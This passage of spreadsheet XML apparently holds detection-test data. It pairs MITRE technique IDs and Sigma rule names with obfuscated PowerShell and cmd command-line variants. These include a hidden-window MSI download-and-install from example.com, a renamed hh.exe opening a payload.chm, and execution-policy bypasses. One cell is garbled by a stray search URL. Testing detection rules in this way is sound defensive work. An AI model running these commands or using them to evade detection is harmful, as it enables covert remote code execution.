      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDEdcomMAnD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="44" t="n"/>
      <c r="J91" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E92" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F92" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G92" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="44" t="n"/>
      <c r="J92" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E93" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E94" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDEDcommaND JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="44" t="n"/>
      <c r="J94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="44" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B96" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C96" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D96" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E96" s="4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6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="44" t="n"/>
      <c r="J96" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B97" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C97" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D97" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E97" s="4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7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B98" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C98" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D98" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E98" s="4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8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="44" t="n"/>
      <c r="J98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B99" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C99" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D99" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E99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9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="44" t="n"/>
      <c r="J99" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C100" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D100" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E100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00" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="44" t="n"/>
      <c r="J100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C101" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D101" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E101" s="4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01" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C102" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D102" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E102" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="43" t="n"/>
      <c r="J102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C103" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D103" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E103" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wiNDowStyLe Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="43" t="n"/>
      <c r="J103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C104" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D104" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E104" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="43" t="n"/>
      <c r="J104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C105" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D105" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E105" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="43" t="n"/>
      <c r="J105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C106" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D106" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E106" s="4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106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B107" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C107" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D107" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E107" s="43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107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="43" t="n"/>
      <c r="J107" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C108" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D108" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E108" s="4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108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="43" t="n"/>
      <c r="J108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C109" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D109" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E109" s="4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109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43" t="n"/>
      <c r="J109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="44" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C110" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D110" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E110" s="4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110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="43" t="n"/>
      <c r="J110" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E111" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="43" t="n"/>
      <c r="J111" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C112" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D112" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E112" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="43" t="n"/>
      <c r="J112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="43" t="n"/>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="44" t="n"/>
      <c r="J113" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="43" t="n"/>
      <c r="B114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C114" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D114" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E114" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noni -W 1 /"exec" bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="44" t="n"/>
      <c r="J114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="43" t="n"/>
      <c r="B115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C115" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D115" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E115" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noNI /"w" 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="44" t="n"/>
      <c r="J115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="43" t="n"/>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E116" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 -exEC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="43" t="n"/>
      <c r="J116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="n"/>
      <c r="B117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C117" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D117" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E117" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" -noni -w 1 -eXeC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="43" t="n"/>
      <c r="J117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="43" t="n"/>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E118" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"noni" -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="43" t="n"/>
      <c r="J118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="43" t="n"/>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E119" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -NonInteractive -WinDOwsTYle Hidden -ep Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="43" t="n"/>
      <c r="J119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="43" t="n"/>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E120" s="44" t="inlineStr">
        <is>
